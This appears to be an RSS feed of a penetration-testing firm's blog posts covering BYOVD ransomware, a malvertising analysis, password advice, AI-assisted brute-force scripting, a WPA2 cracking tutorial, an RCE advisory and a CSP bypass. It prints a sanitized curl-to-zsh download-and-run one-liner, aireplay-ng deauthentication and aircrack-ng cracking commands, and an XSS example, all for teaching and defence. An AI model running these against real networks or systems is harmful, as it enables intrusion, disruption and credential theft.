Raxis https://raxis.com Penetration Testing, Red Teaming, PTaaS and Cybersecurity Services Fri, 13 Mar 2026 19:38:24 +0000 en-US hourly 1 https://raxis.com/wp-content/uploads/2024/08/cropped-favicon-32x32.webp Raxis https://raxis.com 32 32 BYOVD Attacks and EDR Evasion: Why Your Endpoint Security May Not Be Enough https://raxis.com/blog/byovd-attacks-and-edr-evasion-why-your-endpoint-security-may-not-be-enough/ Wed, 18 Mar 2026 11:00:00 +0000 https://raxis.com/?p=55760 Your EDR is active. Your antivirus is updated. Your security team gets alerts. So why are ransomware groups still getting through and why are they doing it faster and more quietly than ever?

The answer may lie in a technique called Bring Your Own Vulnerable Driver (BYOVD), and it is fundamentally undermining one of the most trusted layers of enterprise defense.

What Is BYOVD and Why Does It Work?

BYOVD is an attack technique in which a malicious actor introduces a legitimate, digitally signed, but vulnerable software driver onto a target system. Because the driver is signed and trusted by the operating system, it bypasses scrutiny. The attacker then exploits flaws in that driver to reach the Windows kernel, the highest privilege level in the OS. From there, they can do something far more dangerous than exfiltrate data or drop a payload: they can disable your EDR.

This is what makes BYOVD so effective and so frustrating to defend against. Modern endpoint security tools, like EDR and XDR largely rely on kernel-level visibility to operate. If an attacker can reach the kernel first and terminate those processes, your security tooling goes dark before the ransomware ever executes.

The technique isn’t new. The Lazarus Group used it as early as 2021; the Cuba and RobbinHood ransomware gangs adopted it shortly after. But what is interesting is how BYOVD attacks have evolved.

The Reynolds Ransomware: A Dangerous Evolution

The most significant recent development in BYOVD is the emergence of Reynolds, a new ransomware family disclosed in February 2026. You may have seen Nathan Anderson’s blog last month alerting IT teams to Reynolds, which doesn’t just use BYOVD; it embeds it directly inside the ransomware payload. Let’s take a deeper dive here.

In traditional BYOVD-assisted ransomware attacks, the evasion component is a separate tool deployed as a precursor step. E.g. kill the EDR first and then drop the ransomware. Reynolds collapses these into a single operation. Upon execution, the malware drops a vulnerable NsecSoft NSecKrnl driver (CVE-2025-68947), uses it to terminate security software processes, and then proceeds to encrypt the victim’s files, all in one bundled payload.

This is a huge leap forward for several reasons:

It’s quieter. No separate driver file dropping to disk means fewer detection opportunities before encryption begins.

It’s faster and more streamlined. By combining evasion and encryption, defenders have no window to interrupt the attack chain. Barracuda’s 2026 threat data showed that the fastest observed ransomware cases in 2025 took just three hours from initial breach to encryption. Reynolds compresses that window further.

It’s more easily packaged. Bundling defense evasion into the payload makes ransomware attacks easier to carry out, lowering the barrier for affiliates and making Reynolds a more attractive offering in the ransomware-as-a-service (RaaS) ecosystem.

This isn’t an isolated case. Just prior to Reynolds’ disclosure, in a separate incident, attackers weaponized a driver for the EnCase digital forensics suite, turning it into a defense-evasion mechanism.

BYOVD is Quickly Becoming the Dominant Defense Evasion Strategy

The use of impairment tools has increased markedly over the past two years directly in response to EDR vendors improving their ability to detect pre-ransomware threats. It’s the classic arms race. The better defenders got at spotting the precursors, the more attackers invested in techniques to blind those detectors before deploying their payload.

The EDR killer toolbelt has matured accordingly. Readily available tools include:

  • TrueSightKiller: Leverages the vulnerable “truesight” driver
  • AuKill (BurntCigar/Poortry): Used by LockBit and shares code with the open source Backstab tool
  • GhostDriver: Publicly available, widely used across ransomware groups
  • Warp AVKiller: Uses a vulnerable Avira anti-rootkit driver
  • Gmer: A rootkit scanner repurposed to kill security processes
  • EDRKillShifter: Introduced by RansomHub in 2024; purpose-built to load and exploit vulnerable drivers

These tools are actively traded and sold on criminal forums. In 2023, a tool called Terminator, which claimed to bypass 23 different AV/EDR/XDR products, was publicly advertised on Russian cybercrime forums for anyone willing to pay.

Why Microsoft’s Defenses Have Gaps

The most direct structural defense against BYOVD in the Windows ecosystem is Microsoft’s Vulnerable Driver Blocklist, which prevents known-bad drivers from loading on Windows systems. But even this has limited effectiveness.

Microsoft’s blocklist is updated only once or twice per year, so a newly weaponized driver could be actively used in attacks for months before it’s effectively blocked in the wild. Microsoft must also weigh whether blocking a given driver could break legitimate systems. Blocking a signed driver has collateral consequences, particularly in healthcare, manufacturing, and other sectors running legacy infrastructure.

Windows also loads drivers during the boot process before network connections are established, preventing certificate revocation lists (CRLs) from being checked. This means that even revoked driver signatures may still successfully load in certain Windows configurations.

The net result is that the burden has largely fallen on EDR vendors to detect and mitigate BYOVD activity, despite it actually being the target of these attacks. These are not the makings of long-term success.

What Organizations Are Getting Wrong

“We have EDR, so we’re covered.” 

EDR is a critical control, but it is not impervious. If an attacker can reach the kernel before your EDR can flag the behavior, your EDR becomes a casual spectator. 

“Our drivers are patched.” 

BYOVD attackers don’t need to exploit your drivers. They bring their own. A fully patched environment is still vulnerable if an attacker can load a legitimately signed driver with known-exploitable flaws from elsewhere.

“We’d see the lateral movement before they got to deployment.” 

Sure, that was true when these attacks required separate multi-step operations. Reynolds changed that. Embedded payloads are specifically engineered to eliminate those observable steps.

“We’re not a big enough target.” 

Yes, you are. 

Practical Defenses That Actually Work

No single control or countermeasure eliminates BYOVD risk, but a layered approach can significantly raise the cost of a successful attack.

  • Enable Hypervisor-Protected Code Integrity (HVCI). This Windows feature prevents unsigned or vulnerable drivers from loading at the kernel level. It is the most direct technical control available and should be enabled on modern hardware.
  • Despite its potential flaws, Microsoft’s Vulnerable Driver Blocklist has a foundational role. The default blocklist is a starting point. Organizations should supplement it with community resources like the Living Off the Land Drivers (LOLDrivers) project, which tracks a broader set of known-vulnerable drivers.
  • Monitor driver load events where practical. Windows Event ID 7045 (new service installed) and kernel driver load activity should be actively monitored in your SIEM. Unexpected driver loads should trigger immediate investigation.
  • Test your EDR; don’t just trust it. Assessment exercises that specifically target kernel-level evasion techniques will reveal whether your EDR stack and response processes can actually catch BYOVD activity before it’s too late.
  • Don’t rely on detection alone. Behavioral controls, network segmentation, privilege management, and robust incident response planning are critical backstops for when (not if) detection fails.
  • This isn’t just another malware story. It’s a signal about where threat trends are heading. Attackers are actively investing in techniques that neutralize security controls and tooling that organizations have heavily invested in to protect their assets. This attack vector is widespread, commoditized, and rapidly maturing.

The organizations best positioned to survive this evolution are not the ones with the most security products. They’re the ones who regularly test those products against real attack techniques, understand what their stack actually catches, and build response capabilities that don’t depend entirely on tools that can be silenced before the alarm sounds.

I hope you’ll take a look at other blogs in our Security Recommendations series, and, if you’d like to be alerted to new blogs like this in our monthly cybersecurity newsletter, you can sign up here.

]]>
Sponsored Malware: When the Bad Guys Pay for Views https://raxis.com/blog/sponsored-malware-when-the-bad-guys-pay-for-views/ Fri, 13 Mar 2026 11:00:00 +0000 https://raxis.com/?p=54926 Today we are going to look at the dangerous side of the Internet. Not the dark web, but search results. 

The Backstory

I was trying to clear up space on my MacBook and found it curious that, after deleting 20GB of no longer used virtual machines, my free space did not go up. In fact, the used space just moved from the Documents category to System Data category. 

I had already emptied the Trash, and my free space did not change. In an effort to understand what was going on, I took to a search engine to try and find out what could be wrong. 

I started with a simple search: “macOS deleted files end up as system data”

At first glance, the second search result appeared to be just what I needed. An article titled “Manage System Data on Mac | Mac Storage Too Full,” and the brief description fit exactly what I needed to know: “See which system data may take up storage and how to keep macOS organized.”

Sponsored Search Result that is Actually Malware
Sponsored Search Result that is Actually Malware

The first red flag is that this is a Sponsored result, which is when someone pays the search engine to place their search result at the top of the list. Usually this is used by brands to advertise their products. If someone searches for “best 2026 truck,” and you make trucks, you might want to pay some cash to make sure your website is at the top of the list. 

When Malware Enters the Search

The danger lies in malicious actors using this very same feature to prey on individuals that are needing help or looking for information. In this case, my very benign search was purchased by someone to get their blog to the top of the result.

Taking a (cautious) look at the article, I see that this blog wants me to copy and paste a command into my Terminal. This is very-red-flag number two. Let’s analyze the code they want me to just blindly copy and paste. The following has been sanitized. Please do NOT follow along at home:

Malicious Blog
Malicious Blog

Malicious code:

/bin/zsh -c "$(curl -fsSL $(echo <base64 encoded data> | base64 -d))"

There are a series of nested commands here. The inner-most command echos and pipes some text to base64 and decodes it. That decoded base64 text is then given to curl as a URL to download. That URL that is downloaded is fed into /bin/zsh to be executed. 

Let’s safely decode this text by taking to CyberChef, a very handy web app that can encode and decode almost anything you can imagine. 

Pasting the code into the Input pane and dragging From Base64 into the Recipe list will give us the decoded data in the Output pane. 

Decoding Message with CyberChef
Decoding Message with CyberChef

Breaking Down the Malicious Code

Here’s the URL that the above command would happily download and execute. I’m going to stand up a quick cloud server to safely download this file for further analysis. After downloading the file, I take a look, and it appears to assign the contents of some base64 encoded and gzipped data to a variable:

Malicious Command Setting a Variable
Malicious Command Setting a Variable

I went ahead and copy/pasted the variable assignment and then echoed that variable into a file for further analysis. Reading the file with the contents of that encoded data, I see it’s another script. This time it downloads another file from a web server, saves it to local disk, and sets it as executable:

Variable Assignment Is a Script that Downloads a File from the Internet
Variable Assignment Is a Script that Downloads a Malware File from the Internet

Here, I’ve downloaded the file to confirm it’s still available and to confirm it’s a Mach-O binary for MacOS systems:

The Downloaded Malware File

Reverse Engineering the Malware File

Since reverse engineering malware is not my strong suite, I used Ghidra to decompile the binary and then I consulted our good friend Claude, which analyzed the decompiled binary and determined it to be malicious:

Claude Explains Why the Downloaded File is Malicious
Claude Explains Why the Downloaded File is Malicious

Why Staying Vigilant Is Critical

As a professional penetration tester, my day job involves hunting for exploits and vulnerabilities so that I can effectively demonstrate the impact of vulnerabilities within our clients’ systems. Sometimes this leads me down the rabbit hole of malware and suspicious executables. It is disheartening seeing how easy regular Internet users can run across malware, and, if they don’t know what to look out for, I can see someone falling for these sponsored ads and running malware on their system.

While I may hunt down and download exploit code during the course of a penetration test, I always validate the code prior to executing on client infrastructure. In fact, most of the time when I run across an exploit for some new CVE, I find out the script is just making a few key API calls. In those cases, I always re-create the exact API calls myself rather than using the published exploit code. 

Join Our Newsletter for More Stories Like This

If you found this helpful, I encourage you to sign up for the Raxis Monthly Newsletter. We don’t share your email or spam you, we just send a monthly email with links to blogs like this and cybersecurity alerts that may help pentest customers and penetration testers alike.

]]>
The Hidden Risks in Your Password: What You Type Matters More Than You Think https://raxis.com/blog/hidden-risks-in-your-password/ Tue, 10 Mar 2026 11:00:00 +0000 https://raxis.com/?p=53123 In the ever-evolving landscape of cybersecurity, passwords remain the frontline defense for our digital lives. At Raxis, we specialize in red team engagements and penetration testing, helping organizations identify vulnerabilities before malicious actors can exploit them. 

That often means that our penetration testers gain access (through complicated means I will let them explain in other blogs) to many cleartext passwords. When that happens, they provide statistics about the discovered passwords to our customers.

We find that, while many customers want to know how strong passwords are, a key concern that often flies under the radar is missed… what do those passwords say about the user. Today, I’d like to discuss why choosing the right password goes beyond complexity. Instead it’s about protecting your privacy and professionalism in ways you might not expect.

The Basics: Unique and Evolving Passwords

Let’s start with the fundamentals. A strong password is your first barrier against unauthorized access. It should be unique to each account. Think of it this way, reusing the same password across multiple sites is like leaving the same key under every doormat in your neighborhood. If one account gets compromised, all others become vulnerable.

Best practices also recommend changing passwords periodically, especially for critical accounts like email, banking, or work systems. This isn’t just about refreshing for the sake of it; it’s a proactive step to mitigate risks from undetected breaches. If a password has been exposed in a data leak (which happens more often than you’d think), rotating it ensures that old credentials can’t be used against you. Tools like password managers can make this process seamless, generating and storing complex passwords without the hassle of memorization.

But here’s where things get interesting… and potentially awkward. While focusing on length, complexity (mixing uppercase, lowercase, numbers, and symbols), and uniqueness is crucial, the content of your password deserves equal scrutiny.

The Perils of Expressive Passwords

We’ve all had those frustrating days at work where venting feels necessary. But channeling that frustration into your password? That’s a recipe for regret. Passwords like thisJ0bSUCKS2@ or IhateMYb055 might seem like a harmless private joke (after all, who’s going to see them?), but unfortunately, in the world of cybersecurity, passwords aren’t as private as they appear.

During routine security assessments, penetration testers often gain access to systems they can work to exploit for credentials. These exercises simulate real-world attacks, attempting to guess or brute-force passwords using dictionaries of common words, variations, and patterns. If your password includes disparaging remarks about yourself, your job, boss, or colleagues, it could be cracked and documented in a report. These reports are shared with IT teams and often executives. Imagine your clever quip about hating your manager ending up in a boardroom discussion. Our pentesting team at Raxis has seen that happen.

Password discovered

It gets worse. Cracked passwords from breaches are often leaked onto dark web forums, where cybercriminals trade stolen data. Organizations routinely monitor these spaces as part of their threat intelligence audits. If your password surfaces there, it could reveal more than just a security flaw. It might expose personal sentiments that could damage your professional reputation or lead to uncomfortable conversations.

Self-deprecating passwords fall into the same trap. Something like ImAnIdi0t2023! might feel self-aware and secure due to its complexity, but, if exposed, it could undermine your credibility or invite unwanted scrutiny. You would likely be shocked at the negative messaging we see in passwords as a common occurrence in our testing. 

In a recent engagement, we cracked a high percentage of 12+ character passwords. Many of these passwords contained messaging that is very unlikely the users would want discovered. Unfortunately, that particular penetration test is not an anomaly. 

The key question to ask yourself when crafting a password: If this were to become public, would I be okay with people seeing it?

Real-World Implications and How to Avoid Them

At Raxis, we’ve seen firsthand how seemingly innocuous choices can lead to bigger issues. Passwords aren’t just strings of characters; they’re potential windows into your mindset.

To stay safe:

  • Aim for Neutral Complexity: Use random combinations or passphrase generators. For example, turn a neutral phrase like @2BlueSkyC0ffeeRain! into something strong and forgettable to outsiders.
  • Leverage Password Managers: These tools create and store passwords that are complex without being personally revealing.
  • Enable Multi-Factor Authentication (MFA): Even the best password is stronger with a second layer of verification.
  • Think Exposure-First: Always consider the what if scenario. Passwords can be exposed through breaches, shoulder-surfing, or even shared devices.

By treating passwords as potentially public artifacts, you not only enhance your security but also safeguard your personal and professional image.

Final Thoughts: Passwords with Purpose

In cybersecurity, the goal is protection – both digital and personal. Unique, regularly updated passwords are essential, but steering clear of ones that disparage or reveal ill thoughts takes your strategy to the next level. At Raxis, we’re committed to helping you build resilient defenses that consider the human element. Remember: A good password doesn’t just lock the door; it ensures that, if the lock is exposed, there’s nothing embarrassing waiting on the other side.

If you’re concerned about your organization’s password policies or want to simulate a real attack to uncover your company weaknesses, reach out to Raxis for a consultation. 

]]>
AI-Augmented Series: AI Scripting for Brute-Forcing on a Web App Pentest https://raxis.com/blog/ai-augmented-series-ai-scripting-for-brute-forcing-on-a-web-app-pentest/ Wed, 04 Mar 2026 12:00:00 +0000 https://raxis.com/?p=54769 The other day I was on a web application penetration test. During testing I was going through the login functionality to check for common issues like account enumeration and vulnerability to a brute-force attack. 

Normally when doing these checks I capture the request with Burp Suite and then send it to the Repeater tab. From there I make changes and send the request over and over again. On this particular engagement, I kept running into an issue where the request would expire after a short amount of time.

After some investigation I narrowed it down to a particular cookie. With the help of AI, I was able to identify the function that generated the cookie then reimplement it in python so I could create my own brute-force script. 

In this blog I’ll go through this process with a lab site to show just how this can be done and what web developers will want to watch for to protect their sites.

Setting Up the Sample Site with a Cookie

First, we need a web server that takes a request. For testing and demonstration, I’m just going to have the app check the cookie and respond when we click a button:

  • If the cookie is old, it will say expired
  • If the cookie is still valid, it will say success

If you’re anything like me, you already have access to a web server with PHP for testing. If not, you can follow along in this blog. Once the test site is setup, we click the button which sends a request, intercept that request, and send it to Burp Suite’s Repeater tab. We can replay the request and get the expected success message.

Successful Use of New Cookie
Successful Use of New Cookie

Now we have a little bit of time before it expires for our test, but eventually it will expire like shown.

Cookie Expired
Cookie Expired

This matches the functionality I saw on my pentest closely enough for a demonstration.

Using AI to Write a Script

Now, in our case, the HTML file isn’t that complex, so you could simply right click, view source, and understand what’s happening. But on many modern apps this isn’t the case as there are thousands of lines of code. Not to mention many times they get minified, so the function and variable names aren’t helpful as they are single letters. 

So, what’s a good way to find the functionality we need?

Breakpoints.

Now this was the first point where AI made my life easier. It gave me a block of code I could enter into the console that would look for where the cookie I needed got its value set and then call the debugger so I could take a look more closely.

// Intercept cookie setting
   const orig = Object.getOwnPropertyDescriptor(Document.prototype, 'cookie');
   Object.defineProperty(document, 'cookie', {
     set(val) { if (val.startsWith('AmIExpired')) debugger; orig.set.call(this, val); }
   });

After running the command (make sure to change your cookie name if it’s different), you can trigger the request. In our example, we click the button. Now the code throws us into the debugger, paused on our code.

Debugger Paused on Our Code
Debugger Paused on Our Code

Let’s pay particular attention to the call stack:

Call Stack
Call Stack

We only have three functions in the call stack, but in real modern apps, this could be a lot more. So now we go through them and search for the code that creates the cookie. Let’s check the send function:

Send Function
Send Function

Hey, that looks like the code that’s generating the cookie. Now here’s where the AI saved me a ton of time. I took the code, gave it to the AI, and asked it to reimplement it in python.

AI Command and Results
AI Command and Results

Wow that was easy and also much faster than doing it manually myself.

Now after changing the target in the script, I ran it and got a 200 Success, so we know it works.

Some Pointers

I almost always work in a venv with python. After creating it, I had to install requests and pycryptodome with pip.

Using Venv with Python
Using Venv with Python

At this point I could add additional functionality to handle whatever else I need it to do, but I’ll leave that for an actual penetration test. As a side note the pages and scripts used in recreating this exploit for this blog were also generated by AI with my guidance so that I could show the details clearly. 

What the Devs Need to Know

Anything client side can be replicated, so you can’t rely on client-side code for controls like rate limiting. It may stop a low level person but not someone dedicated to hacking the site. When coding anything for controls, it needs to be coded on the server-side.

Final Thoughts

Pentests are time-boxed, meaning sales teams work with customers to figure out how long they should take to test as much as possible and discover the most important vulnerabilities (and to stay on budget).

Using AI like we did here saves pentesters time when exploiting important vulnerabilities. In the past, we may not have had time to complete a full exploit to show our customers how important the finding was, or we may have spent that time and limited our time testing other areas.

This is what makes AI so useful. Now we get the best of both worlds, and our customers get even deeper penetration testing results so that they can remediate findings that would leave their organization vulnerable.

]]>
Wireless Series: The Aircrack-ng Suite for All Your Wireless Pentesting Needs https://raxis.com/blog/wireless-series-aircrack-ng-for-wireless-pentesting-needs/ Tue, 24 Feb 2026 12:00:00 +0000 https://raxis.com/?p=52094 If you enjoyed my tutorial on Wifite last summer, I’ve got another great wireless penetration testing tool to discuss today. 

The Aircrack-ng suite is an amazing set of tools for Wi-Fi security testing. It offers a range of uses from network monitoring, capturing traffic, packet injection, and analyzing cryptographic settings. Best thing is it comes built into Kali Linux.

Overview of the Aircrack-ng Suite

Airmon-ng: Packet Capture and Monitoring

Airmon-ng can be used to passively monitor wireless network traffic and capture packets for further analysis.

Wi-Fi Cracking – Aircrack-ng

Aircrack-ng can help recover WEP keys (if that’s even still a thing) and crack WPA/WPA2-PSK keys using dictionary brute force attacks after capturing the WPA2 handshake.

Injection and Replay Attacks – Aireplay-ng

Aireplay-ng can perform packet injection, including replay, fake authentication, fragmentation, chop-chop, and ARP-request attacks to facilitate traffic generation for analysis. It also supports deauthentication attacks to force clients to reconnect, enabling handshake capture and revealing hidden SSIDs.

Client-Focused Attacks – Airbase-ng

Airbase-ng can be used to create rogue access point and enable attacks that specifically target clients instead of access points.

Advanced Utilities – Airserv-ng, Airdecap-ng, and Airolib-ng

Airserv-ng is a wireless card server that allows multiple applications to share wireless cards for testing. Airdecap-ng can decrypt encrypted packet captures when keys are known; Airolib-ng prepares databases for fast WPA key testing.

Visualization and Analysis – Airgraph-ng

Airgraph-ng helps visualize wireless networks and relationships between clients and access points, supporting complex penetration testing scenarios.

Cracking WPA2

Before starting, ensure you have a wireless network card that can capture network traffic and perform packet injection (if needed). I use multiple Alfa network cards and have had great success with them.

Once you’ve got your network card connected, you’ll want to place it in monitor mode. First, we need to find the wireless adapter:

iwconfig
ifconfig

Next, we place the adapter into monitor mode:

airmon-ng start <wireless interface>
airmon-ng start

I’ve accidentally skipped this step before and found that sometimes, when I run airodump-ng, the card is moved into monitor mode automatically. It is still a good idea to do the airmon-ng step to ensure the card is in monitor mode properly because the name of the interface could change to something like wlan0mon.

Next, let’s perform some basic recon to see what wireless SSIDs are broadcasting and what hosts are out there. For this scenario we’re looking for the HackMeWiFi network. We also want to make sure it is WPA with PSK auth. This will allow us to capture the WPA2 handshake for offline cracking:

airodump-ng <wireless interface>
Wireless Recon
Wireless Recon

Once we’ve identified the network we’re looking for, we need to check the channel it is broadcasting on, the BSSID, and look for any associated clients. We’ll need this information for targeted attacks:

Target Information
Target Information

Once we’ve gathered all necessary information, we need to setup airmon-ng to capture wireless traffic for when a client associates to the wireless network:

airmon-ng -c <channel> --bssid <access point MAC> -w <file_name> <wireless interface>
Deauth Attack
Traffic Capture
  • -c is the channel we’re targeting
  • -a or --bssid is the MAC address of the access point
  • -w is the file name prefix for the for our packet captures
  • wlan0 is our wireless interface (change to what you have)

Once we’ve got the capture running, we’ll need to open another terminal window or tab and perform a deauthentication attack by targeting all connected clients by sending a blanket deauth or (my preferred) by targeting a specific client, as shown below:

aireplay-ng -0 1 -a <access point MAC> -c <client MAC> <wireless interface>
Captured Handshake
Deauth Attack
  • -0 is the deauthentication attack mode. The number 1 specifies to send a single deauth packet (use 0 for continuous deauth attack).
  • -a or --bssid is the MAC address of the access point
  • -c is the MAC address of the client you are deauthing
  • wlan0 is our working interface to perform attacks and captures (change to what you have)

If successful, we should see airodump-ng capture the handshake:

Aircrack Commands
Captured Handshake

Next, we attempt to crack the captured handshake. My preferred methods are hashcat or aircrack-ng. For this instance, we’ll use aircrack-ng to perform the crack. The commands are pretty simple:

aircrack-ng -w <wordlist> -b bssid <capture file>
Password Find
Aircrack Commands

If the PSK is discovered in the wordlist, then the results should look something like this:

Password Find
Password Find

Those are the basics for cracking WPA2 using the Aircrack Suite. 

A Final Note

There are more things we can do with this suite, so check back again in the future to see what’s next in our Wireless series.

And, if you’re looking to see how secure your organization’s wireless networks are, take a look at Raxis’ wireless network penetration testing options. We often perform these tests remotely using our Raxis Transporter device, allowing our customers to save money and schedule quickly. 

]]>
Reynolds Ransomware BYOVD Eludes EDR Tools https://raxis.com/blog/reynolds-ransomware-byovd-eludes-edr-tools/ Fri, 20 Feb 2026 12:00:00 +0000 https://raxis.com/?p=54122 Ransomware continuously evolves, presenting new challenges for both individuals and organizations. A recent development is the emergence of a sophisticated ransomware named Reynolds, which stands out due to its advanced defense evasion tactics.

Bring Your Own Vulnerable Driver – BYOVD

Reynolds introduces a unique mechanism known as Bring Your Own Vulnerable Driver (BYOVD). Reynolds incorporates an evasion technique directly into its payload, making it highly elusive to security measures such as EDR (Endpoint Detection and Response) tools. BYOVD works by exploiting legitimate but flawed software components, allowing the ransomware to hide its malicious activities and bypass detection mechanisms effectively.

In the case of Reynolds, instead of deploying separate tools beforehand to disable security measures, the malicious driver is bundled within the ransomware itself. Upon execution, Reynolds drops an NsecSoft NSecKrnl driver, exploiting known vulnerabilities (CVE-2025-68947) to terminate processes of various security programs, effectively evading detection and response mechanisms. The NSecKrnl driver, while legitimate, is fraught with a critical vulnerability that enables attackers to terminate arbitrary processes.

The integration of BYOVD within the ransomware payload poses significant challenges for defenders. By bundling defense evasion capabilities, attackers reduce the noise typically associated with deploying separate tools, making it harder for security systems to detect and respond in time. This tactic not only enhances the effectiveness of the attack but also streamlines the process for affiliates, who no longer need to incorporate additional steps into their operations.

Ransomware Trends

This type of cyber threat demonstrates that attackers are continuously seeking new ways to evade security systems, making it harder for antivirus software and other security measures to detect and neutralize these threats efficiently.

Beyond Reynolds, 2025 saw broader trends in ransomware evolution, with both emerging groups, such as GLOBAL GROUP and Devman, and established entities like LockBit adapting their methods. For instance, LockBit’s updated version incorporates advanced encryption techniques and malicious features, underscoring the dynamic nature of cybercrime.

Reynolds demonstrates the need for organizations to put preemptive measures in place, including penetration tests, vulnerability management, and patch management. 

]]>
BeyondTrust RCE Vulnerability Exploited: Critical 9.9 CVSS Flaw Under Active Attack https://raxis.com/blog/beyondtrust-rce-vulnerability-exploited-critical-9-9-cvss-flaw-under-active-attack/ Tue, 17 Feb 2026 12:00:00 +0000 https://raxis.com/?p=54116 BeyondTrust Remote Support is a privileged access management solution used by IT teams and managed service providers to remotely access and troubleshoot systems across their infrastructure. The software handles some of the most sensitive operations in an organization: remote administrative access, credential management, and privileged session monitoring. This makes it a high-value target for threat actors seeking initial access or lateral movement within enterprise networks.

Critical Pre-Authentication RCE Disclosed

On February 6th, 2026, BeyondTrust disclosed a pre-authentication remote code execution vulnerability carrying a 9.9 CVSS score. The “pre-authentication” designation is particularly concerning because attackers don’t need valid credentials or any prior access to exploit the flaw. They can achieve remote code execution simply by sending specially crafted requests to an exposed BeyondTrust instance, effectively gaining a foothold into the organization’s privileged access infrastructure. All cloud-hosted Remote Support customers were automatically patched on February 2nd, four days before the public disclosure. However, customers with on-premises deployments of BeyondTrust must manually patch the software to remediate the vulnerability.

Active Exploitation Following PoC Release

Less than a week after the disclosure, a public Proof-of-Concept (PoC) was published on GitHub and within a day SOCs began reporting active exploitation attempts. If your organization has an on-premises deployment that is not patched, it should be assumed to be compromised. No additional information has been disclosed about post-exploitation activity or targets.

The Importance of Proactive Monitoring

Beyond the immediate remediation, this incident highlights why proactive monitoring has become non-negotiable. Security teams should be actively monitoring for exploitation attempts against any internet-facing services, especially in the critical 48-72 hour window following a major vulnerability disclosure. Network traffic analysis, behavioral monitoring of remote support sessions, and threat intelligence feeds can provide early warning of compromise attempts before attackers establish persistence.

AI-Accelerated Exploit Development

The timeline of this incident reflects a broader shift in the threat landscape. The window between vulnerability disclosure and active exploitation is shrinking, largely due to AI-powered tools that can rapidly generate working exploit code from technical advisories. What once required skilled reverse engineering and days of development can now be accomplished in hours with large language models analyzing CVE descriptions and patch diffs. Organizations must adapt their security strategies to account for this compressed timeline, assuming that any critical vulnerability disclosure will be followed by working exploits and active scanning shortly thereafter.

]]>
Bypassing a WAF and a CSP with Google Tag Manager: An Attacker’s Perspective and Remediation Advice https://raxis.com/blog/bypassing-waf-and-csp-with-google-tag-manager/ Tue, 10 Feb 2026 12:00:00 +0000 https://raxis.com/?p=51832 During several penetration tests last year, I observed clients often set unsafe directives for Google Tag Manager usually to supplement data collection via Google Analytics and third-party vendors. 

Aside from the obvious problem of using unsafe directives, this threat was amplified since Google hosts malicious JavaScript from googletagmanager.com. The text below outlines functionally what a CSP may or may not block. 

My research focused on Google Tag Manager, so I submitted parts of this to Google as part of their bug bounty program. They awarded me with an honorable mention and swag, as you can find on their website by searching my name here.

Ryan Chaplin's honorable mention for this Bug Hunters submission.

However, do not think this is limited to Google Tag Manager, if developers use unsafe directives from any platform that allows users to upload or host malicious content, the same exploit will work.  

Today I’m going to chat about what I discovered, how it works, and how organizations can remediate the issue. We’ve got a lot to discuss, so here are a few quick links to each section:

  1. CSP Background
  2. Bypassing a CSP with Google Tag Manager
  3. Bypassing a Cloudflare WAF with Google Tag Manager
  4. Remediation Advice

What does a CSP do in practice? 

Content-Security-Policy (CSP) directives protect a site from unwanted content, especially malicious content, and are fundamental part of web security. 

Consider the intentionally vulnerable JavaScript I have pasted below that was implemented on a sample web server and is used throughout this article. This same code will be used in every example until the remediation section of this article where a .NET Blazor server configuration and an Nginx.conf code snippets are provided. 

Below is part of a vulnerable web application that trusts user input in the name parameter of the URL, does not sanitize it, and directly appends the input to the body. This is a classic Cross-site Scripting (XSS) vulnerability that we’ll use to demonstrate the power of a CSP:

A vulnerable web application which trusts user input in the name parameter of the URL, does not sanitize it, and directly appends the input to the body.

This developer likely intended to use this for a feature like displaying a user’s name or something similar:

Possibly the developer planned yo use this to display a user's name like this.

However, of course, even a novice hacker will find this relatively quickly and realize it is a reflected Cross-site Scripting (XSS) vulnerability:

But it is very easy to perform reflected XSS on that configuration.

A well-defined CSP will prevent this type of attack. Below is an example of a minimal CSP that blocks the attack. The main directive that was added and prevented the XSS payload from executing was returned in the error message as a nonce. A nonce should be a server generated random value which, when used in a CSP, determines whether scripts are valid and can execute or not. Since the nonce is server generated and unique for each request, the JavaScript in my URL must have the random value in the nonce which I cannot possibly know when sending the request. Therefore, I cannot include the nonce in my script and my attack is blocked:

A minimal CSP which causes this attack to be blocked.

Problems Implementing a CSP and Modern Solutions

So why aren’t CSPs more widely implemented? Historically it was difficult to manage. Due to the changing nature of third-party libraries, it meant organizations needed to incorporate extra steps into their build cycle to generate hashes for third-party scripts. Additionally, business complexities of cross-team communication and collaboration for every script on the server limited implementation. 

Before strict-dynamic became widely implemented, nonce-based and hash-based CSPs had a major limitation: they couldn’t handle dynamically loaded scripts well. This code snippet highlights the issue:

// Your trusted script with a nonce
<script nonce="random123">
  // Dynamically created script is BLOCKED by CSP!
  const script = document.createElement('script');
  script.src = 'https://cdn.example.com/library.js';
  document.head.appendChild(script);
</script>

Even though your script was trusted, any scripts it dynamically loaded would be blocked unless:

  • They were explicitly in your CSP allowlist, OR
  • You could add nonces to them which became nearly impossible for frequently changing third-party scripts.

This made strict CSP policies incompatible with several modern JavaScript frameworks and third-party libraries.

The Solution

Using the strict-dynamic directive propagates trust. If a script is trusted (via nonce or hash), then any scripts it loads are automatically trusted too.

Content-Security-Policy: script-src 'nonce-random123' 'strict-dynamic'

Much of the deployment complexity was fixed with the introduction of the strict-dynamic directive. Safari was the last browser to adopt it, and that was in 2021. The strict-dynamic directive allows additional scripts from the source to load as long as they are via non-"parser-inserted" script elements [source]. In layman’s terms, this means most third-party scripts can be loaded by a source with a nonce, so no more generating hashes for each third-party script. 

For example, in Google’s documentation they give great advice on setting a nonce when deploying Google Tag Manager. They even note the hashing option and describe many ways to do this. However, their advice in a copy/paste-able snippet is: 

script-src ‘nonce-{SERVER-GENERATED-NONCE}’:
Google documentation for setting a nonce.

Let’s look what happens if we follow Google’s directions blindly. I have set up a nonce and used their nonce-aware version of the script, exactly as described in their documentation:

Following Google's directives above, the XSS is blocked but so is our Custom HTML Tag.

The XSS attack was blocked! The CSP also correctly blocked the inline script. Unfortunately, it did its job a bit too well. Now native features to Google Tag Manager, like the Custom HTML Tag, have stopped loading. 

Note that the error only impacts “Custom HTML” and “Custom JavaScript” loaded through GTM. Google Analytics and likely many other libraries will work at this point. Unfortunately, Custom HTML and Custom JavaScript are frequently required for analytics purposes. In those cases, this CSP may not be acceptable, as that data is often deemed critical to the business. Sometimes it even connects to cookie consent, so it is a legal requirement. 

Surely Google has a solution. Right? The only other instructions (aside from the lone MDN link to nonces) discourages unsafe-inline but immediately gives you the exact unsafe directive, where to place it, and even put a star next to it to say, “Certain tags … require the use of additional CSP directives to function properly.” There is no mention of the strict-dynamic directive.

Google's confusing instructions.

